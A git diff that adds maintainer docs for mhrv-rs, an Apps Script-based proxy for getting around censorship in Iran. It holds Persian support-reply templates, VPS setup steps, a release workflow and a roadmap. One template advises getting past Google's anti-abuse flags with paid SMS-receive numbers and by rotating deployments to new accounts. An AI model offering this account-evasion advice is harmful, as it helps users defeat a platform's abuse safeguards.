+| `cloud.google.com`, `colab`, `gmail`, `meet`, `gemini`, `drive` not loading | 4 (self-loop restriction → #420) |
+| `YouTube video doesn't play`, `This content isn't available`, `playback error` | 5 (SABR cliff → #300) |
+| Android, `Gmail app`, `YouTube app`, `Telegram`, "browser works but apps don't" | 6 (user trust store) |
+| `Cloudflare`, `captcha`, `403 Forbidden`, "checking your browser" | 7 (CF bot detection → #382) |
+| `Google account`, `phone required`, `action required`, `suspension`, `Workspace landing` | 8 (account flag) |
+| `Telegram support`, `WhatsApp call`, `Skype`, `voice call`, `video call` | 9 (UDP/MTProto architectural) |
+| Config has `google_ips`, `scan_batch_size`, `max_ips_to_scan` | 10 (scan_config confusion) |
+| `egui_glow`, `OpenGL`, `wgl`, `Wgpu(NoSuitableAdapterFound)`, `run.bat` | 11 (Windows OpenGL → CLI) |
+| `VPS`, `Hetzner`, `Parspack`, `setup help`, "step by step VPS" | 12 (Full mode setup) |
+| `سهمیه پهنای باند`, `bandwidth quota`, Iranian VPS provider | 13 (provider appliance) |
+| Persian HTML body in error log + non-Iranian VPS | 14 (account locale) |
+| `IDM`, `download stuck`, `large file`, `1 GB download` | 15 (range/cliff) |
+
+If the issue doesn't fit any pattern, it's worth reading carefully — these are the genuine new bugs.
diff --git a/docs/maintainer/references/persian-templates.md b/docs/maintainer/references/persian-templates.md
new file mode 100644
index 00000000..932dcd76
--- /dev/null
+++ b/docs/maintainer/references/persian-templates.md
@@ -0,0 +1,439 @@
+# Persian reply templates
+
+These are starting templates for the highest-frequency Persian-language replies. Don't use them verbatim — adapt to the specific user's log lines, config, and report. They exist to prevent re-deriving common phrasings each time and to keep the project's Persian voice consistent across replies.
+
+The conventions throughout assume:
+- Polite professional register (`می‌فرمایید` over `می‌گی`, full pronouns)
+- Half-spaces (ZWNJ, `‌`) in compound words
+- Latin-script for technical terms inline with Persian particles
+- Persian numerals optional in prose (`۲۰،۰۰۰` or `20,000` both fine — match the user)
+- Code blocks always in Latin
+- Reply marker (Latin) at end
+
+## Template 1: AUTH_KEY mismatch (with redeploy-as-new-version walkthrough)
+
+For users showing the v1.8.x decoy detection log line:
+
+```markdown
+این `502` با body `The script completed but did not return anything` دقیقاً همان pattern decoy detection است که در v1.8.x اضافه شد. شش علت ممکن (per v1.8.3 taxonomy) داره ولی محتمل‌ترین برای case شما **AUTH_KEY mismatch** است.
+
+**نکته بسیار مهم که اکثر کاربران نمی‌دونند:**
+
+اگر AUTH_KEY رو در Code.gs ویرایش کرده‌اید **بعد از deployment اولیه**، Apps Script اتومات edit رو در deployment موجود pick-up نمی‌کنه. لازمه که **redeploy as new version** کنید:
+
+1. در Apps Script web editor بازش کنید
+2. Deploy → **Manage Deployments** (نه Deploy → New deployment)
+3. روی **deployment موجود** کلیک کنید → پنسیل (Edit)
+4. در dropdown **Version** → **New version** انتخاب کنید (نه "Head")
+5. Description بنویسید (مثلاً "AUTH_KEY update")
+6. **Deploy** کلیک کنید
+
+URL deployment همون می‌مونه ولی الان Apps Script کد جدید با AUTH_KEY جدید رو serve می‌کنه.
+
+**Diagnostic سریع برای تأیید AUTH_KEY mismatch:**
+
+در بالای Code.gs این خط رو پیدا کنید:
+
+`const DIAGNOSTIC_MODE = false;`
+
+تغییر دهید به:
+
+`const DIAGNOSTIC_MODE = true;`
+
+سپس **redeploy as new version** کنید (مثل بالا). سپس test:
+
+- اگر **هنوز decoy body همون** برمی‌گرده → علت **NOT** AUTH_KEY mismatch است (یکی از سایر ۵ علت)
+- اگر **JSON `{"e":"unauthorized"}` صریح** برمی‌گرده → بله، AUTH_KEY mismatch — fix رو با aligning AUTH_KEY در config.json با Code.gs انجام دهید + redeploy as new version
+
+بعد از debug کامل، DIAGNOSTIC_MODE رو به `false` برگردونید + redeploy. در production این flag رو false نگه می‌داریم چون decoy body anti-fingerprinting protection محسوب می‌شه.
+
+نتیجه DIAGNOSTIC_MODE flip + پیغام دقیق error بعد از redeploy رو share کنید + می‌تونیم narrow کنیم.
+
+---
+<sub>[reply via Anthropic Claude | reviewed by @therealaleph]</sub>
+```
+
+## Template 2: TUNNEL_AUTH_KEY exact spelling
+
+For users showing `tunnel_auth_key not set, using defaults` in `docker logs mhrv-tunnel`:
+
+```markdown
+مشکلت یادم نرفته! `tunnel_auth_key not set, using defaults` در log‌ها یعنی **اسم env variable هنوز اشتباه است**. می‌خوام دقیق‌تر توضیح بدم چون اسم env vars خیلی sensitive هست:
+
+**اسم env variable باید دقیقاً این باشد** (نه چیز دیگه‌ای، نه شبیه به این):
+
+```
+TUNNEL_AUTH_KEY
+```
+
+- **همه‌ش حروف بزرگ**
+- **با underscore (`_`) بین کلمات** — نه فاصله، نه dash
+- **سه قسمت**: `TUNNEL` + `_` + `AUTH` + `_` + `KEY`
+
+**اشتباهات رایج که `tunnel_auth_key not set` می‌ده:**
+
+| اشتباه | چرا کار نمی‌کنه |
+|--------|-----------------|
+| `Tunnel` یا `tunnel` (تنها) | اسم کامل نیست، tunnel-node این رو نمی‌خونه |
+| `Tunnel_Auth_Key` یا `tunnel_auth_key` (lowercase/mixed) | env vars در Linux/Docker case-sensitive هستن |
+| `TUNNEL-AUTH-KEY` (با dash) | باید underscore باشه نه dash |
+| `MHRV_AUTH_KEY` | اشتباه قدیمی، tunnel-node این رو نمی‌خونه |
+
+**دستور docker run درست — کپی exact:**
+
+```bash
+ssh root@your-vps-ip
+docker stop mhrv-tunnel
+docker rm mhrv-tunnel
+
+docker run -d --name mhrv-tunnel \
+  --restart unless-stopped \
+  -p 8443:8443 \
+  -e TUNNEL_AUTH_KEY="your-secret-here" \
+  ghcr.io/therealaleph/mhrv-tunnel-node:latest
+```
+
+به‌جای `your-secret-here` همون مقداری که در CodeFull.gs گذاشتید بنویسید.
+
+**verify بعد از start:**
+
+```bash
+docker exec mhrv-tunnel env | grep TUNNEL_AUTH_KEY
+```
+
+اگر خروجی این باشه:
+```
+TUNNEL_AUTH_KEY=your-secret-here
+```
+درسته. اگر هیچ خروجی نداد یا خروجی متفاوت بود، دستور `docker run` با اسم اشتباه اجرا شده.
+
+نتیجه + خروجی `docker exec` رو share کنید + اگر همچنان مشکل بود narrow می‌کنیم.
+
+---
+<sub>[reply via Anthropic Claude | reviewed by @therealaleph]</sub>
+```
+
+## Template 3: #313 ISP throttle (for "504 timeout" reports)
+
+For users with intermittent timeouts that look like ISP throttle:
+
+```markdown
+این الگو با [#313](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/313) (Iran ISP throttle Apps Script outbound) match می‌کنه. throttle این هفته در حال پلاسی بوده — گاهی off می‌شه ساعتی، گاهی روزی.
+
+**Diagnostic سریع — direct curl test:**
+
+```bash
+curl -L -X POST 'https://script.google.com/macros/s/YOUR_DEPLOYMENT_ID/exec' \
+  -H 'Content-Type: application/json' \
+  -d '{"k":"YOUR_AUTH_KEY","u":"https://httpbin.org/get","m":"GET"}' \
+  --max-time 30 -w "\ntime: %{time_total}s\n"
+```
+
+اجرا کنید ۵-۱۰ بار. اگر:
+
+- اکثرشون timeout/RST می‌گیرن = #313 ISP throttle (شبکه شما Apps Script رو filter می‌کنه)
+- اکثرشون JSON برمی‌گردونن = مشکل از path mhrv-rs است (config، auth_key، یا غیره)
+
+**Workaround احتمالی برای ISP throttle:**
+
+۱. **به نسخه v1.8.3 (الان موجود) ارتقا دهید:**
+   - دانلود از <https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases/tag/v1.8.3> یا <https://t.me/mhrv_rs>
+   - شامل DoH bypass، H1 keepalive، 6-cause error detection
+
+۲. **`disable_padding: true` در config:**
+
+```json
+{
+  "disable_padding": true,
+  ...
+}
+```
+
+~۲۵٪ bandwidth کم‌تر، در شبکه‌های throttle شده compounds رو کم می‌کنه.
+
+۳. **`google_ip` متفاوت تست کنید** — default `216.239.38.120` ممکنه روی شبکه شما filter شده + یکی دیگه از pool reachable است. لیست pool در `src/domain_fronter.rs` `DEFAULT_GOOGLE_SNI_POOL`.
+
+۴. **شبکه عوض کنید** — همراه/MCI کم‌ترین throttle داره معمولاً. اگر روی Wi-Fi مخابرات هستید، با موبایل دیتا تست کنید.
+
+۵. **چند `script_ids` داشته باشید** — اگر یک deployment quota tear گرفته یا throttle شده، rotation کار می‌کنه. حداقل ۳-۵ deployment.
+
+۶. **اگر VPS دارید** — Full mode رو امتحان کنید (راهنما [tunnel-node README فارسی](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/tunnel-node/README.fa.md)). ISP throttle Apps Script outbound روی Full mode اعمال نمی‌شه.
+
+نتیجه v1.8.3 + curl test + log رو share کنید + می‌تونیم narrow کنیم.
+
+---
+<sub>[reply via Anthropic Claude | reviewed by @therealaleph]</sub>
+```
+
+## Template 4: VPS setup (Full mode) walkthrough
+
+For "how do I set up VPS?" questions:
+
+```markdown
+**Q: آیا VPS باید مستقیم از Iran قابل دسترسی باشه؟**
+
+**کوتاه: نه.** VPS لازم نیست از Iran direct reachable باشه. این مزیت architectural mhrv-rs Full mode است.
+
+مسیر traffic:
+
+```
+Phone (Iran) → mhrv-rs client (Iran) → Apps Script (via Google IP fronting) →
+                                       Apps Script's UrlFetchApp →
+                                       VPS tunnel-node container →
+                                       upstream internet
+```
+
+دقت کنید: **مسیر از Iran به VPS از طریق Apps Script می‌گذره**. پس:
+
+- Iran ISP فقط TLS traffic به Google IPها می‌بینه (`216.239.38.120` و سایر) — مثل HTTPS عادی به Google
+- Apps Script (در Google data center، US/EU) به VPS شما call می‌کنه
+- VPS شما فقط traffic از Google IP می‌گیره (Apps Script's outbound)
+
+پس حتی اگر VPS IP از Iran ISP filter شده باشه، **مهم نیست** چون هیچ Iran connection direct به VPS نمی‌ره.
+
+**Setup گام‌به‌گام:**
+
+**۱. خرید VPS:**
+
+- اگر می‌توانید Hetzner direct: ~€۴.۵۰/ماه از Falkenstein DE — [hetzner.com/cloud](https://www.hetzner.com/cloud)
+- اگر VAT ID نیست: Parspack ([parspack.com/vps](https://parspack.com/vps)) واسطه‌ی آلمانی فروش می‌کنه با ~۲۵۰-۵۰۰ هزار تومان/ماه
+
+specs توصیه شده:
+- شخصی: 1 vCPU، 1 GB RAM، 25 GB SSD، 50+ Mbps unmetered
+- خانوادگی (۵+ device + Instagram smooth): 2-4 GB RAM، 100 Mbps unmetered
+
+**۲. Docker install:**
+
+```bash
+ssh root@your-vps-ip
+apt update && apt upgrade -y
+apt install -y docker.io
+systemctl enable --now docker
+docker --version  # verify
+```
+
+**۳. tunnel-node container run:**
+
+```bash
+docker run -d --name mhrv-tunnel \
+  --restart unless-stopped \
+  -p 8443:8443 \
+  -e TUNNEL_AUTH_KEY="your-secret-here" \
+  ghcr.io/therealaleph/mhrv-tunnel-node:latest
+```
+
+**اسم env var دقیقاً `TUNNEL_AUTH_KEY` ست** — uppercase، با underscore. هر deviation در default `changeme` می‌افته + بعداً mismatch می‌سازه.
+
+برای ساخت secret تصادفی:
+```bash
+openssl rand -hex 32
+```
+
+**۴. firewall:**
+
+```bash
+sudo ufw allow 8443/tcp
+sudo ufw allow ssh
+sudo ufw enable
+```
+
+**۵. verify direct از خود VPS:**
+
+```bash
+curl -X POST 'http://localhost:8443/tunnel' \
+  -H 'Content-Type: application/json' \
+  -d '{"k":"YOUR_TUNNEL_SECRET","op":"connect","host":"www.google.com","port":443}' \
+  --max-time 10
+```
+
+باید JSON success برگرده. اگر نه، tunnel-node container start نشده.
+
+**۶. CodeFull.gs setup:**
+
+در [`assets/apps_script/CodeFull.gs`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/assets/apps_script/CodeFull.gs) محتوا رو copy کنید + در script.google.com یک پروژه جدید ایجاد کنید + paste کنید.
+
+بالای فایل تنظیم کنید:
+
+```js
+const AUTH_KEY = "your-mhrv-auth-key";
+const TUNNEL_URL = "http://YOUR_VPS_IP:8443/tunnel";
+const TUNNEL_AUTH_KEY = "your-tunnel-secret-here";  // match با docker run -e
+```
+
+سپس **Deploy → New deployment → Web App → Execute as: Me + Who has access: Anyone → Deploy**. URL deployment رو copy کنید + ID بخشش رو بردارید.
+
+**۷. mhrv-rs config:**
+
+```json
+{
+  "mode": "full",
+  "auth_key": "your-mhrv-auth-key",
+  "script_ids": ["YOUR_DEPLOYMENT_ID"]
+}
+```
+
+**`script_ids` plural با s** — این یک typo رایجه که config رو 0-deployment می‌کنه.
+
+**۸. Connect + verify:**
+
+mhrv-rs رو start کنید + log باید نشون بده:
+
+```
+INFO batch: 1 ops → AKfyc..., rtt=Xs    ← good
+INFO tunnel session abc1234... opened for ...:443    ← good
+```
+
+اگر `ERROR batch failed: got the v1.8.0 bad-auth decoy` می‌گیرید، AUTH_KEY mismatch است (gam ۶ check کنید).
+
+اگر `Connection refused` به VPS، firewall بسته است (gam ۴ بررسی کنید).
+
+برای فارسی-language راهنما با تصاویر [tunnel-node README فارسی](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/tunnel-node/README.fa.md) رو ببینید.
+
+اگر در گامی fail کرد، error log + خروجی command رو share کنید + می‌تونیم narrow کنیم.
+
+---
+<sub>[reply via Anthropic Claude | reviewed by @therealaleph]</sub>
+```
+
+## Template 5: Account suspension / phone-required (for "action required" reports)
+
+For users reporting Google account flag or "action required" notifications:
+
+```markdown
+این الگو شناخته‌شده‌ست + در اساس Google's anti-abuse system فلاگ می‌کنه new accounts که immediately Apps Script deployment می‌سازن (مخصوصاً بدون phone verification).
+
+**Stage تشخیص account flag:**
+
+```
+Stage 1: "Action required - add phone number"
+   ↓ (phone اضافه می‌شه) → account stable
+   ↓ (phone اضافه نمی‌شه + automation activity ادامه می‌ده)
+   ↓
+Stage 2: "Account temporarily restricted"
+   ↓ (Apps Script deployments شروع می‌کنن Workspace landing HTML برگردونن
+   ↓  به‌جای execute کردن — see #421 + cause #6 در v1.8.3 detection)
+   ↓
+Stage 3: "Account suspended" — full lockout، deployments fail
+```
+
+شما الان در Stage 1. اگر زود phone verify کنید، account stable می‌مونه + deployments بدون مشکل ادامه می‌دن.
+
+**برای فکر شما درباره ban Google account کلی:**
+
+در history reports این پروژه (~۵۰+ کاربر در طول سال گذشته)، **هیچ confirmed case full account ban** ندیدم. consequences scope-شده به Apps Script + UrlFetchApp quota — نه Gmail یا Drive یا سایر Google services. accounts با history regular usage (Gmail, Drive files، etc.) و age چند سال + در low-risk قرار دارند برای personal CodeFull.gs deployment.
+
+**workarounds:**
+
+**۱. بهترین: phone اضافه کنید.**
+
+Iranian phone گاهی filter می‌شه، ولی می‌توانید:
+
+- phone یک friend/family member outside Iran استفاده کنید (SMS code رو forward کنند)
+- TextNow / Google Voice (US) / paid SMS-receive services
+- بعضی موارد Google یک phone رو روی چند account قبول می‌کنه (~۵ account per phone limit)
+
+**۲. اگر phone نمی‌توانید:**
+
+accounts احتمالاً به Stage 2-3 progress می‌کنن طی روزها-تا-هفته. برای حفظ service:
+
+- deployments جدید زیر accounts متفاوت بسازید قبل از اینکه old fail کنه
+- از **community shared deployment** workflow ([#325](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/325)) استفاده کنید — friend با account stable deployment می‌سازه + ID share می‌کنه + AUTH_KEY مشترک
+
+**۳. برای access به script.google.com وقتی شبکه slow:**
+
+می‌توانید از **mhrv-rs خود** برای access به script.google.com استفاده کنید. mhrv-rs's HTTP proxy به browser → CONNECT tunneling به Google عمل می‌کنه (نه UrlFetchApp.fetch — که Google block می‌کنه). browser رو با proxy `127.0.0.1:8086` تنظیم کنید + بروید script.google.com.
+
+**Action item:**
+
+اگر Stage 1a هستید (notification ولی deployments هنوز کار می‌کنن): فوراً phone verify کنید.
+
+اگر Stage 1b هستید (deployments شروع به Workspace HTML برمی‌گردونن): همان، plus rotation deployment‌ها به accounts سالم.
+
+---
+<sub>[reply via Anthropic Claude | reviewed by @therealaleph]</sub>
+```
+
+## Template 6: Architectural limit (Google services + UrlFetchApp self-loop)
+
+For users asking why `cloud.google.com` / `colab` / `gmail` / `meet` / `gemini` doesn't work:
+
+```markdown
+این محدودیت **architectural** است + ربطی به config یا setup شما نداره.
+
+**Apps Script's UrlFetchApp self-loop restriction:**
+
+`UrlFetchApp.fetch()` Google در API hardcoded ساخته که نمی‌تونه به دامنه‌های `*.google.com` / `*.googleapis.com` / `*.gstatic.com` request بفرسته. Apps Script یا empty response می‌ده یا 4xx/5xx error.
+
+این محدودیت **Google ست** (نه implementation ما) + در Apps Script API documentation هم ذکر شده. هیچ HTTP-relay مبتنی بر Apps Script نمی‌تونه به Google services از Apps Script→Google path برسه.
+
+**سایت‌های متأثر:**
+
+- `cloud.google.com` — Console
+- `colab.research.google.com` — Colab
+- `gemini.google.com` — Gemini chat
+- `drive.google.com` — Drive
+- `docs.google.com` / `sheets.google.com` / `slides.google.com` — Workspace
+- `meet.google.com` — Meet (Web)
+- `mail.google.com` — Gmail
+- `script.google.com/home/usage` — Apps Script dashboard
+- `*.google.com` به‌طور کلی
+
+**راه‌حل‌ها:**
+
+**۱. سایت‌های alternative:**
+
+- به‌جای Drive: WebDAV / Mega / Cloudflare R2
+- به‌جای Colab: Kaggle Notebooks / Jupyter Lab روی VPS
+- به‌جای Gemini: ChatGPT (openai.com) / Claude (claude.ai) — اگر CF block نشدن، کار می‌کنن
+- به‌جای Cloud Console: SSH مستقیم یا cloud provider's CLI
+
+**۲. Full mode + VPS:**
+
+VPS از طرف خود به Google direct وصل می‌شه. در Full mode، traffic Google رو می‌توانید با xray dual-routing از mhrv-rs bypass کنید. detail در [#420](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/420). با این setup همه‌ی Google services از طریق VPS direct کار می‌کنن.
+
+**۳. temp VPN موقت:**
+
+برای access گاه‌گاهی به Google services (مثلاً برای download فایل از Drive یا setup OAuth)، یک VPN موقت ۱۰ دقیقه‌ای استفاده کنید + سپس به mhrv-rs برمی‌گردید.
+
+**نتیجه:**
+
+اگر می‌خواهید سایت‌های Google کار کنن با همان setup mhrv-rs که الان دارید، نیاز به Full mode + VPS + xray routing است. تا وقتی فقط apps_script mode دارید، Google services unreachable می‌مونن.
+
+---
+<sub>[reply via Anthropic Claude | reviewed by @therealaleph]</sub>
+```
+
+## Common Persian phrases for inline use
+
+When writing custom replies, these phrases come up frequently and should be standardized:
+
+| Concept | Persian phrasing |
+|---------|------------------|
+| "redeploy as new version" | `redeploy as new version کنید (نه head)` |
+| "exact match" | `دقیقاً match کنه` / `exact match` |
+| "case-sensitive" | `case-sensitive است` |
+| "ISP throttle" | `ISP throttle` (English term, transliterate not used) |
+| "narrow down" | `narrow کنیم` |
+| "share the log" | `log رو share کنید` |
+| "thanks for the report" | `ممنون از گزارش` / `تشکر از گزارش` |
+| "I owe you" / "apologies" | `معذرت می‌خوام بابت` |
+| "for your specific case" | `برای case خاص شما` |
+| "unfortunately" | `متأسفانه` |
+| "the workaround is" | `workaround این هست که...` |
+| "this is a known issue" | `این مشکل شناخته شده است` |
+| "feature is queued" | `feature در roadmap است` |
+| "we'll ship in v1.x.y" | `در v1.x.y ship می‌شه` |
+| "configuration file" | `فایل config` |
+| "command line" | `command line` / `terminal` / `ترمینال` |
+| "deployment" (Apps Script) | `deployment` (transliterated `دپلوی` is not used in this project) |
+| "tunnel" (Full mode) | `tunnel` |
+| "browser" | `browser` / `مرورگر` |
+| "system proxy" | `system proxy` |
+| "page loads but X doesn't work" | `page بالا میاد ولی X کار نمی‌کنه` |
+| "I tested with curl" | `با curl تست کردم` |
+| "the bug is fixed in vX.Y.Z" | `bug در vX.Y.Z حل شده` |
+| "thanks for catching this" | `ممنون از catch کردن این` |
+| "let me know if it works" | `اگر کار کرد گزارش بدید` |
+| "if it fails again, share the log" | `اگر دوباره fail کرد، log رو share کنید` |
+
+These let Persian replies use English technical terms naturally without forced transliteration, which matches how Iranian developers actually talk.
diff --git a/docs/maintainer/references/release-workflow.md b/docs/maintainer/references/release-workflow.md
new file mode 100644
index 00000000..7e5b0698
--- /dev/null
+++ b/docs/maintainer/references/release-workflow.md
@@ -0,0 +1,211 @@
+# Release workflow
+
+Cutting a release is fast and low-ceremony for this project. Most releases are patch bumps that go from "decision to ship" to "Telegram channel posting" in under 30 minutes of human work + ~30 minutes of CI.
+
+## When to cut a release
+
+Cut a release whenever **anything user-visible** has landed since the last tag. User-visible includes:
+
+- Bug fixes that affect runtime behavior
+- New config options
+- New CLI subcommands or flags
+- Diagnostic improvements (better log messages, error categories)
+- Apps Script script changes (Code.gs / CodeFull.gs)
+- Documentation that users will read (README updates, troubleshooting docs — though these can also batch into the next release)
+
+Don't cut for:
+- Internal refactors with no behavior change
+- CI/workflow file edits
+- Markdown formatting fixes
+- Test-only changes
+
+When in doubt, cut. Patch releases are cheap and Iranian users actively check the Telegram channel for updates.
+
+## The release workflow
+
+### Step 1: Decide the version
+
+Read the latest tag:
+
+```bash
+git describe --tags --abbrev=0
+```
+
+Then bump:
+- **Patch (Z+1)** — for ~95% of releases. v1.8.2 → v1.8.3
+- **Minor (Y+1)** — for a coherent feature batch shipped together. v1.7.x → v1.8.0 represented "DPI evasion + active-probing defense + full-mode usage counters" together
+- **Major (X+1)** — never done in this project's history. Reserved for true protocol-incompatible changes with the Apps Script side. Don't bump major without explicit go-ahead.
+
+### Step 2: Bump `Cargo.toml`
+
+Edit `Cargo.toml` line 3 (`version = "X.Y.Z"`). Keep package name `mhrv-rs` unchanged. The `tunnel-node` subcrate has its own version that's independent — don't bump it unless you're shipping a tunnel-node change.
+
+### Step 3: Build to refresh `Cargo.lock`
+
+```bash
+cargo build --release 2>&1 | tail -3
+```
+
+`Cargo.lock` will pick up the new version string. Verify with:
+
+```bash
+git diff Cargo.lock | head -20
+```
+
+Should show only the `name = "mhrv-rs"` block's `version = "X.Y.Z"` change.
+
+### Step 4: Write the changelog
+
+Create `docs/changelog/vX.Y.Z.md` using the format in `assets/changelog-template.md`. Persian first, then `---`, then English. See `workflow-conventions.md` for format details.
+
+When the release is shipping multiple PRs from contributors, credit each by name + handle in both halves of the changelog.
+
+### Step 5: Run tests + final build
+
+```bash
+cargo test --lib 2>&1 | tail -5
+cargo build --release 2>&1 | tail -3
+cargo build --bin mhrv-rs-ui --release --features ui 2>&1 | tail -3
+```
+
+All three must succeed. Test count varies by version. All passing is the gate.
+
+If any contributor PRs were merged in this release, also verify by re-running tests after the merge — sometimes integration with main reveals issues that didn't show in the PR's CI.
+
+### Step 6: Commit + tag + push
+
+```bash
+git add Cargo.toml Cargo.lock docs/changelog/vX.Y.Z.md
+git status  # sanity check
+git commit -m "$(cat <<'EOF'
+chore: vX.Y.Z — <short summary fitting under 75 chars>
+
+<longer body explaining the why and the changes — see workflow-conventions.md
+for format>
+EOF
+)"
+
+git push origin main
+git tag vX.Y.Z
+git push origin vX.Y.Z
+```
+
+The `git push origin vX.Y.Z` is the trigger — release CI auto-fires on tag push.
+
+If `git push origin main` fails with `non-fast-forward`, someone (often the auto-binary-refresh CI from a prior release) pushed in the meantime:
+
+```bash
+git pull --rebase origin main
+git push origin main
+git tag vX.Y.Z   # if you didn't tag yet
+git push origin vX.Y.Z
+```
+
+If you already tagged before the push race, the tag still works — it's pinned to your commit, and the rebase shouldn't change your commit's SHA unless there were conflicts.
+
+### Step 7: Watch CI
+
+```bash
+gh run list --limit 3
+```
+
+Two workflows fire on tag push:
+1. **`release-drafter`** — quick (~15s), updates the GitHub release draft. Always succeeds.
+2. **`release`** — slow (~25-35 minutes), builds binaries for all platforms, attaches to release.
+
+Once `release` succeeds, a third workflow auto-fires:
+3. **`Telegram publish release files`** — posts each binary individually to the Telegram channel `mhrv_rs` with Persian captions, SHA-256 hashes, and a cross-link from the main channel. Takes ~1-2 minutes.
+
+If `release` fails, common causes:
+
+- **Cross-compile failure** — particularly on i686 / mipsel. i686 was dropped from the matrix in v1.7.11 because of MSRV churn (see #411 thread). If a new architecture starts failing, it's usually a transitive dep bumping MSRV past what the toolchain pinned for that target supports. Triage: check which architecture's job failed, look at the cargo error, decide whether to pin a dep with `cargo update --precise` or drop the architecture.
+- **`actions/download-artifact@v4` flakiness** — replaced with `gh run download` + 3-attempt retry in v1.7.11. Should be stable now; if it flakes again, increase retry count.
+
+After CI succeeds, optionally check the binary refresh:
+
+```bash
+git pull origin main
+git log --oneline -3
+```
+
+You should see an auto-generated commit `chore(releases): refresh prebuilt binaries for vX.Y.Z` from the release CI bot.
+
+### Step 8: Verify Telegram channel
+
+The Telegram publish workflow posts to channel `mhrv_rs` (public link `https://t.me/mhrv_rs`). The channel should show:
+
+1. An announcement post: `📦 mhrv-rs vX.Y.Z منتشر شد...` referencing the changelog file
+2. ~16 individual file posts (Android APKs split by ABI, Windows ZIP, macOS arm64/amd64 dmg+tar, Linux x86_64/arm64 incl. musl, Raspbian, OpenWRT)
+3. Each file caption includes Persian description (e.g., "نسخه ویندوز x86") + SHA-256 hash
+4. A "main channel" post (different channel) cross-linking to the files channel post
+
+Files larger than 50 MB get chunked into `.part_aa`, `.part_ab`, etc. via the `split` pattern in `.github/scripts/telegram_publish_files.py`.
+
+If something didn't post, check the workflow run logs:
+
+```bash
+gh run view <run-id> --log
+```
+
+Common cause: the auto-fire dispatch on `workflow_run` requires the parent workflow to succeed; if release.yml had a flaky download retry, the dispatch might still succeed but partial.
+
+## Manual re-publish (rare)
+
+If you need to re-trigger Telegram publishing for an already-released version (e.g., the workflow failed and you fixed it), use `workflow_dispatch`:
+
+```bash
+gh workflow run "Telegram publish release files" -f version=vX.Y.Z
+```
+
+The script downloads artifacts via `gh release download` (not the workflow's artifacts) so it works retroactively.
+
+## Re-cutting a release (very rare)
+
+If a release was tagged and pushed but turns out to be broken (e.g., bug in a merged PR you wanted to revert):
+
+1. **Don't** delete the tag if the release is already public. Iranian users may have already pulled the binaries; a deleted tag confuses them and they think the project is gone.
+2. Cut a fix immediately as the next patch (vX.Y.Z+1).
+3. Optionally edit the GitHub release notes for the broken version to say "known issue, upgrade to vX.Y.Z+1".
+
+If you tagged but didn't push yet, just delete the tag locally and re-tag after fixing:
+
+```bash
+git tag -d vX.Y.Z   # local only; safe
+# fix the issue, commit
+git tag vX.Y.Z
+git push origin vX.Y.Z
+```
+
+## Pre-release rollback
+
+If `cargo test --lib` fails after merging PRs but before tagging:
+
+1. Don't tag.
+2. Either revert the merge commit (`git revert <merge-commit-sha>`) or fix forward (commit a new fix on main).
+3. Re-run tests until green.
+4. Tag.
+
+The release CI doesn't run tests before building, so untagged-but-broken main is fine — you have time to fix before tagging.
+
+## Coordinating with multiple PRs in flight
+
+If two PRs are both ready to merge, the order matters:
+
+- Merge them one at a time (not both into a single tag) **only** if they're independent
+- If they touch the same files, merge them sequentially with `gh pr checkout N1 && cargo test && merge`, then `gh pr checkout N2` (which now bases on the new main; CI on the PR may show the old base, but the local checkout sees latest main) `&& cargo test && merge`
+- If a merge introduces conflicts, GitHub's UI flags the PR as conflicting; resolve via `gh pr checkout N` + manual rebase + push to the PR branch
+
+After all PRs are merged, **then** bump version, write changelog (covering all merged PRs), tag, push.
+
+## Versioning the tunnel-node subcrate
+
+`tunnel-node/Cargo.toml` has its own version field separate from the main crate. Bump it when:
+
+- Changing the tunnel-node HTTP API (`/tunnel`, `/batch` endpoints)
+- Changing the auth flow (`TUNNEL_AUTH_KEY` semantics)
+- Changing the env var contract
+- Bumping the Docker image label
+
+For pure internal refactors of tunnel-node that don't change the surface, leave it alone — the Docker image at `ghcr.io/therealaleph/mhrv-tunnel-node:latest` continues to be the latest tag and users don't need to know an internal version bumped.
+
+When tunnel-node version bumps, the Docker image gets re-tagged in the registry by the CI. Users running `docker pull ghcr.io/therealaleph/mhrv-tunnel-node:latest` get the new version automatically; users pinned to a specific version stay pinned.
diff --git a/docs/maintainer/references/roadmap.md b/docs/maintainer/references/roadmap.md
new file mode 100644
index 00000000..5a1482bd
--- /dev/null
+++ b/docs/maintainer/references/roadmap.md
@@ -0,0 +1,118 @@
+# Roadmap
+
+This is the project's queued work, organized by release batch. Use it when:
+- Categorizing a new feature request from a user (which batch does this fit?)
+- Cross-referencing roadmap items in your replies ("queued for v1.8.x")
+- Deciding what to ship in the current batch vs deferred
+
+Update this file when items ship (move to "shipped") or when new items are added (cluster with similar items in the right batch).
+
+## v1.8.x (current batch — small fixes + diagnostics + Android UI)
+
+The v1.8.x line is a **small-and-frequent** release pattern. Each release ships one or two completed items rather than batching many. The theme is "diagnostic improvements + Android UX + Apps Script script enhancements".
+
+### Shipped
+
+- ✅ **v1.8.0**: Random padding (DPI evasion), auto-blacklist deployments, decoy responses, full-mode usage counters, active-probing defense, DIAGNOSTIC_MODE flag in Code.gs
+- ✅ **v1.8.1**: Decoy detection client-side (with v1.8.2/v1.8.3 corrections), `script_id` in error logs, `disable_padding` config flag
+- ✅ **v1.8.2**: UI binary tracing reads `config.log_level` (with reload handle for live changes), softer 4-cause decoy detection error message
+- ✅ **v1.8.3**: Spreadsheet-backed response cache (Code.gs, opt-in), DoH bypass for known DoH endpoints, H1 container keepalive (240s), 64 KB header cap with HTTP 431, clearer port-collision error message
+
+### Queued (small, can ship in next 1-3 patch releases)
+
+- **v1.8.4 candidate items**:
+  - Soften decoy detection further with the 6-cause taxonomy (Persian quota body + Workspace landing HTML detection)
+  - Per-`script_id` rolling-window error-category counter visible in CLI/UI
+  - run.bat auto-fallback to CLI when both UI renderers fail (#417 / #426)
+  - TUNNEL_AUTH_KEY startup warning when `MHRV_AUTH_KEY` is set without `TUNNEL_AUTH_KEY` (catches the recurring #391-style env var typo)
+  - Range-aware splicing in Code.gs (lets large downloads work via HTTP Range requests, partial fix for #441)
+
+### Queued (medium-effort, batch into focused release)
+
